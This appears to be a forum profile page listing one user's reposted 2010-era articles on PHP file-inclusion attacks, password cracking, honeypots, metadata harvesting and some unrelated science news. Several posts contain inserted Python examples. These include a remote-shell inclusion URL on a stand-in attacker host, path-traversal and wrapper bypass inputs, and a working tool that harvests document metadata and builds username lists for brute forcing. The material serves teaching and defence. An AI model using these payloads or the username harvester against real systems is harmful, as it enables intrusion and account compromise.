Everything posted by begood
-
We aren't here to talk about theoretical hacks, or "If" scenarios. Call bullshit on us for anything you can't get working or don't think actually happens. Want a white paper put into perspective? Can't quite figure out how a tool or exploit works, or how it works into a pen test? That's what we do. Shoot a comment, tweet or Facebook update our way and we'll feature it on a show.

Source: Practical Exploitation
-
PHP is a scripting language that is deployed on countless web servers and used in many web frameworks. "PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML."[1] In 2007, at least 20 million websites had PHP deployed. The exponential growth of PHP came from the development of LAMP/WAMP stacks. These stand for Linux/Apache/MySQL/PHP and Windows/Apache/MySQL/PHP respectively. They ensure that deployment of PHP applications is simple enough for the most novice web developer. Many of you may have heard of WordPress, Drupal, or Joomla. These are common web applications that are written entirely in PHP. Many sites run PHP as their main scripting language, such as YouTube, Facebook, Digg, and Wikipedia.

PHP also powers cybercrime. A large majority of publicly disclosed vulnerabilities are PHP related. In 2009, 5733 PHP Remote File Inclusion vulnerabilities were disclosed.[2] In situations where exploiting PHP RFI is possible, most likely SQL Injection and Cross Site Scripting are also possible. This is due to the exploits having the same root cause: lacking input validation.

What is a PHP Remote File Injection (RFI) attack? A PHP RFI attack occurs when there is unvalidated input to a PHP script. This allows PHP code to be injected by a malicious person. For example, a typical PHP URL would look something like this: www.example.com/errors.php?error=errorsfile.php. How can this be abused to cause PHP RFI? The errors.php script is taking a file as input, which in the example is errorsfile.php. If the site is vulnerable and does not have input validation, any file could be used as input, even files from remote servers. When the vulnerable server requests www.example.com/errors.php?error=http://evilhaxor.com/remoteshell.php, the remoteshell.php file will be processed by the web server.

Attackers can do quite a bit with remotely included PHP files, including opening a shell, enumerating users or programs, and defacing the website. Basically, whatever user the web server is running as, an attacker can run commands as that user.

How do we fix PHP RFI? There are several variables within the PHP configuration that can be set to provide a more secure environment for PHP code to run in. These are register_globals, allow_url_fopen, and allow_url_include. In an ideal world, we would be able to set all of these variables in the php.ini file to Off. However, in most cases this will break applications dependent on these features. A thorough review of their usage should be done before setting any of them to Off. Another solution is to implement secure coding practices in PHP and to implement input validation. Detailing input validation methods and ways to securely code PHP is too complex for this article. However, you can discover more by reading the OWASP Top 10 entries for PHP RFI and the Web Application Security Consortium article on PHP RFI. Both will help you learn about this threat and take precautions for your own network.

Source: MSI :: State of Security, Understanding PHP RFI Vulnerabilities
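The article names input validation as the real fix but does not show what it looks like. As an added example (not from the MSI article), the Python below models the decision errors.php has to make before it calls include(): a fragile prefix denylist side by side with an allowlist that treats the error parameter as a key into a fixed table of pages. The page table, the directory and the bypass inputs are assumptions; the remote-shell URL is the one the article uses.

```python
"""Allowlist versus denylist validation of a PHP-style ?error=<file> include
parameter.

Added example, not from the MSI article: it models the decision a script such
as errors.php?error=errorsfile.php must make before passing the value to
include(). The page table, directory and sample inputs are assumptions.
"""
import posixpath

# Hypothetical application: the only pages errors.php legitimately includes.
PAGES_DIR = "/var/www/example/pages"
ALLOWED_PAGES = {
    "errorsfile": "errorsfile.php",
    "notfound": "notfound.php",
    "maintenance": "maintenance.php",
}


def denylist_ok(param):
    """The fragile fix: refuse a couple of known-bad shapes and include
    whatever survives. Kept here only to show what it lets through."""
    return not param.startswith(("http://", "ftp://")) and ".." not in param


def allowlist_resolve(param):
    """The robust fix: the parameter is a key into a fixed table and the path
    is built server-side. Returns the file to include, or None to refuse."""
    key = param.strip().lower()
    if key.endswith(".php"):
        key = key[:-4]
    page = ALLOWED_PAGES.get(key)
    if page is None:
        return None
    full = posixpath.normpath(posixpath.join(PAGES_DIR, page))
    # Defence in depth: even a bad table entry must not escape PAGES_DIR.
    if not full.startswith(PAGES_DIR + "/"):
        return None
    return full


def classify(params):
    """For each candidate value: does the denylist let it through, and what
    does the allowlist resolve it to?"""
    return {p: (denylist_ok(p), allowlist_resolve(p)) for p in params}


# Constructed inputs: the legitimate page and the remote shell from the
# article, plus shapes that slip past a prefix denylist.
SAMPLE_INPUTS = [
    "errorsfile.php",
    "http://evilhaxor.com/remoteshell.php",
    "HTTP://evilhaxor.com/remoteshell.php",   # case defeats a case-sensitive prefix check
    "https://evilhaxor.com/remoteshell.php",  # scheme simply not on the list
    "php://filter/convert.base64-encode/resource=config.php",  # stream wrapper, no network
    "data:text/plain,<?php phpinfo(); ?>",
    "../../../../etc/passwd",
]

if __name__ == "__main__":
    for value, (weak_ok, resolved) in classify(SAMPLE_INPUTS).items():
        print(f"{value!r:60} denylist passes={weak_ok!s:5} allowlist -> {resolved}")
```

Only the first input resolves to a file; every other value, including the ones the denylist happily passes, is refused without the code ever having to know which wrappers or schemes PHP supports.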
-
In one of the biggest breakthroughs in recent history, scientists have created a synthetic genome that can self-replicate. So what does this mean? Are we about to become gray goo?

Led by Craig Venter of the J. Craig Venter Institute (JCVI), the team of scientists combined two existing techniques to transplant synthetic DNA into a bacterium. First they chemically synthesized a bacterial genome, then they used well-known nuclear transfer techniques (used in IVF) to transplant the genome into a bacterium. And apparently the bacterium replicated itself, too, thus creating a second generation of the synthetic DNA. The process is being hailed as revolutionary.

How to make a synthetic genome

Researchers created a synthetic genome by copying an existing one, Mycoplasma mycoides, and transplanting it into Mycoplasma capricolum. How can we be sure that the M. mycoides is synthetic? When recreating it, the team added a number of non-functional "watermarks" to the genome, making it distinct from the wild version. Once implanted, the M. mycoides genome "booted up" the recipient cells, deleting or disrupting 14 genes. The bacteria went on to function normally, meaning the transplant worked.

"This is the first synthetic cell that's been made, and we call it synthetic because the cell is totally derived from a synthetic chromosome, made with four bottles of chemicals on a chemical synthesizer, starting with information in a computer," said Venter. "This becomes a very powerful tool for trying to design what we want biology to do. We have a wide range of applications [in mind]."

"If the methods described here can be generalized, design, synthesis, assembly and transplantation of synthetic chromosomes will no longer be a barrier to the progress of synthetic biology," write the authors in the paper (available free online from Science).

Proof of concept

At present, this is a proof of concept, but it has some immense potential for the future. The research team at JCVI have been working on this technology for approximately 15 years, and now have a number of possible organisms planned: an algae that would suck up carbon dioxide and excrete hydrocarbons for biofuels; faster vaccine production; water cleaning; and using light energy to create hydrogen gas from water.

As anyone with even a glancing familiarity with sci-fi knows, self-replicating technology could lead to disaster. JCVI have done their due diligence here, and all their engineered creations require nutrients found in the lab to survive. They also have the technology to create "suicide genes" that will prevent the synthetics from living outside of a controlled environment. Aware of the ethical and security issues involved, JCVI has also been in talks with the U.S. government since 2003, as well as being reviewed by independent bioethics groups since 1997.

Ethics of synthetic life

So what does this all mean? Beyond the applications I already mentioned, it's also helping us understand how life works, specifically how it's transmitted through DNA. "This is an important step we think, both scientifically and philosophically. It's certainly changed my views of the definitions of life and how life works," Venter said.

Nature has compiled a number of opinions from prominent academics on the project. Everyone acknowledges that this is just the first step in what could be a very interesting development. "We now have an unprecedented opportunity to learn about life. Having complete control over the information in a genome provides a fantastic opportunity to probe the remaining secrets of how it works," says Mark Bedau of Reed College, Oregon. "A prosthetic genome hastens the day when life forms can be made entirely from non-living materials. As such, it will revitalize perennial questions about the significance of life, what it is, why it is important and what role humans should have in its future."

Jim Collins of Boston University reminds us that there's still much left we don't know. There's a long way to go with this technology, but this advance is incredibly significant, and from it we may see the dawn of a new revolution in molecular biology and genetic engineering.

Press Release, Article in Science. Source: http://io9.com/5543843/
-
The goal is to unify all of the good information found in various bits and pieces into 1 large document. This document is for people who want to learn the how and why of password cracking. There is a lot of information being presented and you should READ IT ALL BEFORE you attempt doing anything documented here. I do my best to provide step by step instructions along with the reasons for doing it this way. Other times I will point to a particular website where you find the information. In those cases someone else has done what I am attempting and did a good or great job and I didn't want to steal their hard work. These instructions have several excerpts from a combination of posts from pureh@te, granger53, irongeek, PrairieFire, and stasik. I would also like to thank each of them and others for the help they have provided me on the BackTrack forum. I had to compress the document so I could attach it. The document as it stands now is 127K. Please let me know if what I have is wrong, or if there is a better way to do something, or if I am missing something. I am planning on making enhancements as people make me aware of them.

Here is the table of contents:

1 LM vs. NTLM
2 Syskey
3 Cracking Windows Passwords
3.1 Extracting the hashes from the Windows SAM
3.1.1 Using BackTrack Tools
3.1.1.1 Using bkhive and samdump v1.1.1 (BT2 and BT3)
3.1.1.2 Using samdump2 v2.0.1 (BT4)
3.1.1.3 Cached Credentials
3.1.2 Using Windows Tools
3.1.2.1 Using fgdump
3.1.2.2 Using gsecdump
3.1.2.3 Using pwdump7
3.1.2.4 Cached Credentials
3.2 Extracting the hashes from the Windows SAM remotely
3.2.1 Using BackTrack Tools
3.2.1.1 ettercap
3.2.2 Using Windows Tools
3.2.2.1 Using fgdump
3.3 Cracking Windows Passwords
3.3.1 Using BackTrack Tools
3.3.1.1 John the Ripper BT3 and BT4
3.3.1.1.1 Cracking the LM hash
3.3.1.1.2 Cracking the NTLM hash
3.3.1.1.3 Cracking the NTLM using the cracked LM hash
3.3.1.1.4 Cracking cached credentials
3.3.1.2 John the Ripper - current
3.3.1.2.1 Get and Compile
3.3.1.2.2 Cracking the LM hash
3.3.1.2.3 Cracking the LM hash using known letter(s) in known location(s) (knownforce)
3.3.1.2.4 Cracking the NTLM hash
3.3.1.2.5 Cracking the NTLM hash using the cracked LM hash (dumbforce)
3.3.1.2.6 Cracking cached credentials
3.3.1.3 Using MDCrack
3.3.1.3.1 Cracking the LM hash
3.3.1.3.2 Cracking the NTLM hash
3.3.1.3.3 Cracking the NTLM hash using the cracked LM hash
3.3.1.4 Using Ophcrack
3.3.1.4.1 Cracking the LM hash
3.3.1.4.2 Cracking the NTLM hash
3.3.1.4.3 Cracking the NTLM hash using the cracked LM hash
3.3.2 Using Windows Tools
3.3.2.1 John the Ripper
3.3.2.1.1 Cracking the LM hash
3.3.2.1.2 Cracking the NTLM hash
3.3.2.1.3 Cracking the NTLM hash using the cracked LM hash
3.3.2.1.4 Cracking cached credentials
3.3.2.2 Using MDCrack
3.3.2.2.1 Cracking the LM hash
3.3.2.2.2 Cracking the NTLM hash
3.3.2.2.3 Cracking the NTLM hash using the cracked LM hash
3.3.2.3 Using Ophcrack
3.3.2.3.1 Cracking the LM hash
3.3.2.3.2 Cracking the NTLM hash
3.3.2.3.3 Cracking the NTLM hash using the cracked LM hash
3.3.2.4 Using Cain and Abel
3.3.3 Using a Live CD
3.3.3.1 Ophcrack
4 Changing Windows Passwords
4.1 Changing Local User Passwords
4.1.1 Using BackTrack Tools
4.1.1.1 chntpw
4.1.2 Using a Live CD
4.1.2.1 chntpw
4.1.2.2 System Rescue CD
4.2 Changing Active Directory Passwords
5 plain-text.info
6 Cracking Novell NetWare Passwords
7 Cracking Linux/Unix Passwords
8 Cracking networking equipment passwords
8.1 Using BackTrack tools
8.1.1 Using Hydra
8.1.2 Using Xhydra
8.1.3 Using Medusa
8.1.4 Using John the Ripper to crack a Cisco hash
8.2 Using Windows tools
8.2.1 Using Brutus
9 Cracking Applications
9.1 Cracking Oracle 11g (sha1)
9.2 Cracking Oracle passwords over the wire
9.3 Cracking Office passwords
9.4 Cracking tar passwords
9.5 Cracking zip passwords
9.6 Cracking pdf passwords
10 Wordlists aka Dictionary attack
10.1 Using John the Ripper to generate a wordlist
10.2 Configuring John the Ripper to use a wordlist
10.3 Using crunch to generate a wordlist
10.4 Generate a wordlist from a textfile or website
10.5 Using premade wordlists
10.6 Other wordlist generators
10.7 Manipulating your wordlist
11 Rainbow Tables
11.1 What are they?
11.2 Generating your own
11.2.1 rcrack - obsolete but works
11.2.2 rcracki
11.2.3 rcracki - boinc client
11.2.4 Generating a rainbow table
11.3 WEP cracking
11.4 WPA-PSK
11.4.1 airolib
11.4.2 pyrit
12 Distributed Password cracking
12.1 john
12.2 medussa (not a typo, this is not medusa)
13 Using a GPU
13.1 cuda - nvidia
13.2 stream - ati

Thanks,

P.S. Thank you everyone for your feedback. Keep it coming.

Changes from version 0.1
* Added a section on plain-text.info
* Added a section on using john the ripper with a custom character list
* Added Xploitz's and pureh@te's wordlists

Changes from version 0.2 - 200 downloads
* Added sections on using ophcrack
* Added sections on Cain and Abel under windows
* Fixed a typo
* New html format

Changes from version 0.3 - 410 downloads
* Moved some content to where it should have been
* Added a section on crunch
* Fixed typos
* Fixed a whole lot of html issues
* Slightly rearranged things to flow better

Changes from version 0.4 - 877 downloads
* Added a section on cached credentials
* Expanded the Novell section
* Fixed typos
* Fixed a couple of html errors
* Moved some things around
* New utility to dump passwords

Changes from version 0.5 - 1573 downloads
* added wpa pw-inspector command
* added a wordlist manipulation section
* added usage of fgdump
* added rcracki section
* added a sample hash.txt to play with
* john can be used for input to aircrack-ng
* moved a few things around for a better flow

Changes from version 0.6 - 422 downloads
* added a section on generating a wordlist from a website
* added head, tail, and sed commands to wordlist manipulation
* added a section on xhydra (pointing to Pureh@te's video)
* added a section on gsecdump
* added a section on medusa
* added a section on cisco
* expanded the crunch section
* moved everything around in an effort to make things easier to find
* the dumbforce and knownforce are not finished

Changes from version 0.7 - 4596 downloads
* Fixed "john --incremental=All --stdout | aircrack-ng -b 00:11:22:33:44:55 -w - test.cap" missing a "-". Thanks to roblad for pointing it out

Changes from version 0.8 - 302 + 1226 (old forums + new)
* updated the guide to support BT4-Pre-Final
* switched from transitional html to strict html
* added a section on cracking office passwords
* added a section on cracking rar passwords
* added a section on cracking zip passwords
* added a section on cracking pdf passwords
* added instructions for remote password dumping for fgdump
* point users to john the ripper wiki for dumbforce and knownforce usage
* convert text urls to links
* updated links
* update versions of software (wine and rcrack)
* fixed several spelling mistakes

Changes from version 0.9
* updated the guide to support BT4 Final
* fixed links to pureh@te's videos
* added instructions to update flash so you can watch videos clearly
* updated the john the ripper section to current versions
* added instructions for using rainbow tables for WPA cracking
* added two new leetifying scripts
* added a small cupp discussion
* added a section on pyrit
* added a section on distributed password cracking using john and medussa
* added a section on cuda and stream
* fixed typo in hash.txt

MOD EDIT: Download link for the guide: http://tools.question-defense.com/Cr...ords_Guide.pdf

Source: Password Cracking Guide
-
Risky.Biz has confirmed IBM staff distributed malware-infected USB drives at the AusCERT security conference this week. In a highly embarrassing admission, the company has sent a broadcast e-mail to all AusCERT attendees warning them of the security lapse.

"At the AusCERT conference this week, you may have collected a complimentary USB key from the IBM booth," the message reads. "Unfortunately we have discovered that some of these USB keys contained malware and we suspect that all USB keys may be affected."

IBM is not the first company to distribute malware at AusCERT -- Australian telco Telstra did exactly the same thing in 2008. Risky.Biz confirmed the authenticity of the e-mail message with IBM.
-
A honeypot is a device placed on a computer network specifically designed to capture malicious network traffic. The logging capability of a honeypot is far greater than any other network security tool and captures raw packet level data, even including the keystrokes and mistakes made by hackers. The captured information is highly valuable as it contains only malicious traffic with little to no false positives. Honeypots are becoming one of the leading security tools used to monitor the latest tricks and exploits of hackers by recording their every move so that the security community can more quickly respond to new exploits.

HoneyBOT works by opening a large range of listening sockets on your computer, from which a selection of these sockets are designed to mimic vulnerable services. When an attacker connects to these services they are fooled into thinking they are attacking a real server. The honeypot safely captures all communications with the attacker and logs these results for future analysis. Should an attacker attempt an exploit or upload a rootkit or trojan to the server, the honeypot environment can safely store these files on your computer for malware collection and analysis purposes. You can download it from here. In this video, Irongeek shows us how to get up and running with HoneyBOT.

Source: Setting up the HoneyBot Honeypot Tutorial
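The mechanism described above, listening sockets that answer with a service banner and log every byte without ever executing any of it, is small enough to show. The Python below is an added example, not HoneyBOT's code: an FTP emulator that records USER/PASS pairs, an HTTP emulator that records request lines, a session driver that can be exercised without a network, and a socketserver front end that binds the ports. Ports 2121 and 8080, the banners and the attacker lines in the tests are assumptions.

```python
"""Minimal low-interaction TCP honeypot in the HoneyBOT style: several
listening ports, each answering with a plausible banner, everything the
attacker sends logged, nothing ever executed.

Added example, not HoneyBOT's code. Banners, ports and sample sessions are
assumptions chosen to look plausible, not copies of any real server.
"""
import datetime
import socketserver
import threading

LOG = []  # captured events; a real deployment appends these to a file


def record(port, peer, event, data):
    entry = {"ts": datetime.datetime.now(datetime.timezone.utc).isoformat(),
             "port": port, "peer": peer, "event": event, "data": data}
    LOG.append(entry)
    return entry


class FtpEmulator:
    """Fake FTP: accept USER, always reject PASS, keep the pair."""
    banner = b"220 (vsFTPd 2.0.5)\r\n"  # assumed banner

    def __init__(self):
        self.user = None

    def respond(self, line):
        cmd, _, arg = line.strip().partition(" ")
        cmd = cmd.upper()
        if cmd == "USER":
            self.user = arg
            return b"331 Please specify the password.\r\n", ("ftp_user", arg)
        if cmd == "PASS":
            return b"530 Login incorrect.\r\n", ("ftp_login", f"{self.user}:{arg}")
        if cmd == "QUIT":
            return b"221 Goodbye.\r\n", ("ftp_quit", "")
        return b"530 Please login with USER and PASS.\r\n", ("ftp_cmd", line.strip())


class HttpEmulator:
    """Fake HTTP: log the request line, answer 404 with an old-looking Server header."""
    banner = b""  # HTTP servers wait for the client to speak first

    def respond(self, line):
        body = b"<html><body>Not Found</body></html>"
        head = (b"HTTP/1.0 404 Not Found\r\nServer: Apache/1.3.37 (Unix)\r\n"
                b"Content-Length: %d\r\nConnection: close\r\n\r\n" % len(body))
        return head + body, ("http_request", line.strip())


TERMINAL_EVENTS = {"ftp_quit", "http_request"}  # a session ends after these


def drive_session(emulator, lines, port, peer):
    """Feed attacker lines through an emulator, logging each one. Takes any
    iterable of str, so it runs without a socket. Returns [(response, (event, data))]."""
    out = []
    for line in lines:
        resp, (event, data) = emulator.respond(line)
        record(port, peer, event, data)
        out.append((resp, (event, data)))
        if event in TERMINAL_EVENTS:
            break
    return out


class HoneyHandler(socketserver.StreamRequestHandler):
    timeout = 30  # scanners that go quiet are dropped instead of holding a thread

    def handle(self):
        port = self.server.server_address[1]
        peer = f"{self.client_address[0]}:{self.client_address[1]}"
        emu = self.server.emulator_cls()
        record(port, peer, "connect", "")
        self.wfile.write(emu.banner)

        def attacker_lines():
            while True:
                raw = self.rfile.readline(1024)  # cap line length; content is only logged
                if not raw:
                    return
                yield raw.decode("latin-1", "replace")

        try:
            for resp, _ in drive_session(emu, attacker_lines(), port, peer):
                self.wfile.write(resp)
        except OSError:  # timeout or reset: the log already holds what was sent
            pass


# Assumed unprivileged stand-ins for 21 and 80; a deployment binds the real ports.
SERVICES = {2121: FtpEmulator, 8080: HttpEmulator}


def serve(services=SERVICES, host="0.0.0.0"):
    """Bind every honeypot port in its own thread; returns the server objects."""
    servers = []
    for port, cls in services.items():
        srv = socketserver.ThreadingTCPServer((host, port), HoneyHandler)
        srv.emulator_cls = cls
        threading.Thread(target=srv.serve_forever, daemon=True).start()
        servers.append(srv)
    return servers


if __name__ == "__main__":
    serve()
    threading.Event().wait()  # run until killed; LOG fills as scanners arrive
```

The emulators never act on what they receive; the only thing a login attempt produces is a log record with the credentials the attacker tried, which is exactly the low-false-positive data the paragraph above describes.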
-
MetaGooFil is an information gathering tool designed for extracting metadata from public documents (pdf, doc, xls, ppt, odp, ods) available on the target/victim websites. The first step in penetration testing any web site or web server is to know what web server is running, and after that comes information gathering: what is there on the web server. MetaGoofil will also help you discover the MAC address from Microsoft Office documents! So now you know what hardware you are dealing with!

MetaGoofil will generate an HTML page with the results of the metadata extracted, plus a list of potential usernames, very useful for preparing a brute-force attack on open services like FTP, POP3, web applications, VPN, etc. It will also extract a list of paths disclosed in the metadata; with this information you can guess OS, network names, shared resources, etc.

A path disclosure found using MetaGooFil:

All this information should not be available on the net, but most companies don't have policies about information leaking... and most of them don't know this information exists. So you can show them what information an attacker can obtain with this simple technique.

How to use MetaGoofil?
1. Search Google for interesting documents in the target site. Example: site:victim.com filetype:pdf
2. Download all files found to a local disk and extract metadata, filtering interesting information.
3. Results example: list of path disclosures found in all analyzed files.

Now, with all the information, you can better prepare your penetration tests.

Download MetaGoofil version 1.4b here: http://pentestit.com/2010/05/21/metagoofil-tool-metadata-analyzer-information-gathering-tool/
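As an added example (not MetaGoofil's code), the Python below performs the extraction step of the procedure above on two documents constructed in memory: a .docx whose docProps/core.xml and app.xml carry the author, last editor and application, and a PDF whose Info dictionary carries an author and a Windows path in its title. It returns authors, software, disclosed paths and username candidates built from the names, which is the list you would hand to a brute-force tool. The names, path and software strings are made up.

```python
"""MetaGoofil-style metadata harvesting: pull authors, software and path
disclosures out of Office and PDF files and turn them into username
candidates for brute forcing.

Added example, not MetaGoofil's own code. The two documents are constructed
in memory so it runs offline; in practice you feed it the files downloaded
after a site:victim.com filetype:pdf search. Names and paths are made up.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "ep": "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties",
}
# Windows profile paths leak the local account name (the captured group).
PATH_RE = re.compile(r"[A-Za-z]:\\(?:Users|Documents and Settings)\\([^\\\s]+)\\\S*")
# Entries of a PDF Info dictionary, e.g. /Author (John Smith)
PDF_KEY_RE = re.compile(rb"/(Author|Creator|Producer|Title)\s*\(([^)]*)\)")


def build_docx(creator, last_modified_by, app):
    """Constructed sample: a .docx is a zip, and only its metadata parts matter here."""
    core = (f'<cp:coreProperties xmlns:cp="{NS["cp"]}" xmlns:dc="{NS["dc"]}">'
            f"<dc:creator>{creator}</dc:creator>"
            f"<cp:lastModifiedBy>{last_modified_by}</cp:lastModifiedBy></cp:coreProperties>")
    appx = f'<Properties xmlns="{NS["ep"]}"><Application>{app}</Application></Properties>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("docProps/core.xml", core)
        z.writestr("docProps/app.xml", appx)
    return buf.getvalue()


def build_pdf(author, creator, title):
    """Constructed sample: just enough PDF syntax to carry an Info dictionary."""
    def lit(s):  # PDF literal string: backslashes must be escaped
        return s.replace("\\", "\\\\").encode("latin-1")
    return (b"%PDF-1.4\n1 0 obj\n<< /Author (" + lit(author) + b") /Creator (" + lit(creator)
            + b") /Title (" + lit(title) + b") >>\nendobj\ntrailer\n<< /Info 1 0 R >>\n%%EOF\n")


def new_meta():
    return {"authors": set(), "software": set(), "paths": set(), "usernames": set()}


def extract_docx(data):
    meta = new_meta()
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        core = ET.fromstring(z.read("docProps/core.xml"))
        for tag in ("dc:creator", "cp:lastModifiedBy"):
            el = core.find(tag, NS)
            if el is not None and el.text:
                meta["authors"].add(el.text.strip())
        if "docProps/app.xml" in z.namelist():
            el = ET.fromstring(z.read("docProps/app.xml")).find("ep:Application", NS)
            if el is not None and el.text:
                meta["software"].add(el.text.strip())
    return meta


def extract_pdf(data):
    meta = new_meta()
    for key, raw in PDF_KEY_RE.findall(data):
        text = raw.replace(b"\\\\", b"\\").decode("latin-1")  # undo literal-string escaping
        if key == b"Author":
            meta["authors"].add(text)
        elif key in (b"Creator", b"Producer"):
            meta["software"].add(text)
        for m in PATH_RE.finditer(text):  # titles often keep the original file path
            meta["paths"].add(m.group(0))
            meta["usernames"].add(m.group(1).lower())  # profile directory = account name
    return meta


def username_candidates(full_name):
    """Common corporate schemes: jsmith, john.smith, johnsmith, john_smith, smithj."""
    parts = [p for p in re.split(r"[\s.]+", full_name.lower()) if p.isalpha()]
    if len(parts) < 2:
        return set(parts)
    first, last = parts[0], parts[-1]
    return {first[0] + last, f"{first}.{last}", first + last, f"{first}_{last}", last + first[0]}


def analyze(documents):
    """documents: iterable of raw file bytes. Returns merged findings as sorted lists."""
    total = new_meta()
    for data in documents:
        found = extract_pdf(data) if data.startswith(b"%PDF") else extract_docx(data)
        for k in total:
            total[k] |= found[k]
    for author in total["authors"]:
        total["usernames"] |= username_candidates(author)
    return {k: sorted(v) for k, v in total.items()}


SAMPLE_DOCS = [
    build_docx("John Smith", "Jane Doe", "Microsoft Office Word"),
    build_pdf("John Smith", "PScript5.dll Version 5.2.2", r"C:\Users\jsmith\Documents\Q3_report.doc"),
]

if __name__ == "__main__":
    for key, values in analyze(SAMPLE_DOCS).items():
        print(f"{key:10}: {', '.join(values)}")
```

The username from the path disclosure (jsmith) and the scheme-generated one from the author field coincide here, which is the confirmation you look for before spending brute-force time on a candidate.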
-
RAMMap v1.0: Have you ever wondered how Windows allocates physical memory or what's using it? RAMMap is a new utility for analyzing system RAM usage on Windows Vista and Windows 7 that provides insight never before available. RAMMap shows information about each page of memory, summaries of memory usage by type, views of file data stored in memory, and more (portions based on code by Alex Ionescu).

Published Wednesday, May 19, 2010 12:46 AM by curtismetz. Filed under: RAMMap

Source: Sysinternals Site Discussion: New Tool: Sysinternals RAMMap v1.0
-
(PhysOrg.com) -- All those paper transistors and paper displays that scientists have been designing can now be powered by an onboard power source, thanks to the development of a new paper supercapacitor. Designed by researchers at Stanford University, the paper supercapacitor is made by simply printing carbon nanotubes onto a treated piece of paper. The researchers hope that the integrated design could lead to the development of low-cost, disposable paper electronics.

In the paper supercapacitor, all the necessary components are integrated onto a single sheet of paper in the form of single walled carbon nanotubes (SWNTs). High-speed printing could be used to print the SWNTs directly onto a piece of paper - anything from Xerox paper to newspaper and even grocery ads will work. At first, the researchers found that the SWNTs were so small that they penetrated the paper through micron-sized pores, which would cause the device to short-circuit. To solve this problem, the researchers first coated both sides of the paper with polyvinylidene fluoride (PVDF), which blocked the pores but still allowed for electrolytes to be transported through the paper. As such, the treated paper could function as an electrolyte membrane and separator without short-circuiting.

"The key design is that SWNTs stick well on paper and do not penetrate through paper completely to avoid shorting," Yi Cui of Stanford University told PhysOrg.com. Once the SWNTs were printed onto the treated paper, they experienced strong bonding forces similar to those experienced when writing with a pen or pencil on paper. Even when rubbed or subjected to tape, the SWNTs remained attached to the paper. After printing SWNTs on both sides of single sheets of paper, electrolyte was loaded to form a supercapacitor. The SWNTs served as both the electrodes and current collectors in the supercapacitor, which had a capacitance of about 3 F/g. The device also showed an excellent cycling stability, with very little loss of capacitance after 2500 cycles. The researchers say the same concept could be extended to make batteries, as well.

The fully integrated supercapacitor is based on an earlier version that the researchers made, in which nanomaterials were coated separately onto different anode and cathode substrates and then assembled together with a separator. The advantage of the new integrated structure is that it allows for high-speed printing, which greatly reduces fabrication costs and brings disposable, flexible, and lightweight paper electronics closer to reality. Cui said that, in the future, the researchers plan "to use this new design for real applications."

Source: Paper supercapacitor could power future paper electronics
-
(PhysOrg.com) -- Scientists in Europe have created a time capsule they call a 'digital genome,' and deposited it in a bunker known as the Swiss Fort Knox, which lies deep beneath the ski slopes of the Swiss Alps. The aim of the project is to ensure future scientists will be able to decipher data stored using obsolete technologies.

The plan is to keep the time capsule at the data storage facility for the next 25 years, locked in a room protected by a 3.5-tonne door. The room is strong enough to survive a nuclear attack. The idea is the culmination of a four-year, 15m Euro ($18.7m US) project known as "Planets" (from Preservation and Long-term Access through NETworked Services), which drew expertise and data from 16 major European libraries, research universities, technology companies, and archives to address what they call "core digital preservation challenges."

One of the two computer scientists responsible for the capsule, Dr Adam Farquhar of the British Library, said in 50 years' time we may not be able to take notebooks off the library shelf and read them as we can today with Einstein's notebooks, since they are likely to be stored digitally. As the technologies are changing rapidly we may not be able to access them.

The time capsule is dubbed a "digital genome" because it contains the keys to the data formats, or the digital equivalent of the genetic code of different data formats, and aims to enable future scientists to decode and access data stored using archaic storage systems. The capsule contains information on the vast range of digital formats used since computers became commonplace, and how the different file formats work, documenting how to tell a processor to retrieve the stored data without access to an operating system or other assembled computer program.

The project organizers say around 1 trillion CDs-worth of data is stored globally and much of this will not be accessible to future technology, any more than data on the old 5.25 inch floppy disks of the 1970s is accessible to most people today. They say the amount of data, which ranges from holiday photographs to clinical trial data and health records, amounts to 100 GB of data (equivalent to 24 tonnes of books) for every person on the planet. Project organizers estimate the EU loses digital information valued at over three billion Euros every year because of the ever shorter lifespan of the technology, with digital file formats having a lifespan of 5-7 years, and data storage devices such as CDs and DVDs only lasting around 20 years.

Professor Andreas Rauber of the University of Technology of Vienna, the second person allowed to handle the time capsule, said digital data has a shelf life of only years, unlike previous data stored as ink on parchment or hieroglyphics carved on stone, which could last for thousands of years. He said if we fail to act now to preserve digital data this could cost billions in the future, but he also said it is impossible to predict what proportion of the data we will not be able to use or access in 25 years' time. The project should benefit many industries needing to access historical data. The Planets project has made software available online to help people decipher data stored in obsolete formats.

More information: PLANETS: Home
-
Italian police reportedly unearthed hidden dossiers on 'enemies' during a raid on Church of Scientology offices in Turin. The files, apparently discovered behind locked doors in a basement office, allegedly contained personal information on judges, police officers and journalists identified as hostile to the church. Details on former Church members who have turned against Scientology were also reportedly recovered from handwritten files and computer records seized following a nine-hour search of the premises. No arrests took place, UPI adds.

The bust was reportedly authorised by local magistrates over concerns the local chapter of Scientology was holding sensitive personal data (including information on health and sexual orientation) in violation of Italy's privacy laws, the Daily Telegraph reports.

Elsewhere the Church has denied claims in Australia that senior members covered up the alleged sexual abuse of an 11-year-old girl. Former Scientologist Carmen Rainer told ABC's Lateline programme that church officials persuaded her and her mum to lie to the authorities about alleged sexual abuse by her stepfather, Robert Kerr. Church of Scientology officials deny this and say it was only through their involvement in the case that Kerr eventually turned himself in and admitted his crimes.

Source: 'Dossiers on enemies' found in Italian Scientology raid, The Register
-
This is actually a very old flaw as it's part of the core HTTP standards; it's exploiting the very way in which the Internet works. Basically most browsers expose browsing history if probed in the right way; the fact was that it was just too resource intensive to get any useful data. Someone has refined the attack using the top 5000 most popular sites, then pulling specific URL data when it gets positive responses on those. With this technique giving them the ability to scan up to 30,000 URLs a second... as soon as you land on the site they can pull the data. I wonder if anyone will start exploiting this to serve more relevant content/ads to users.

It's pretty neat actually, check it out here: http://whattheinternetknowsaboutyou.com/

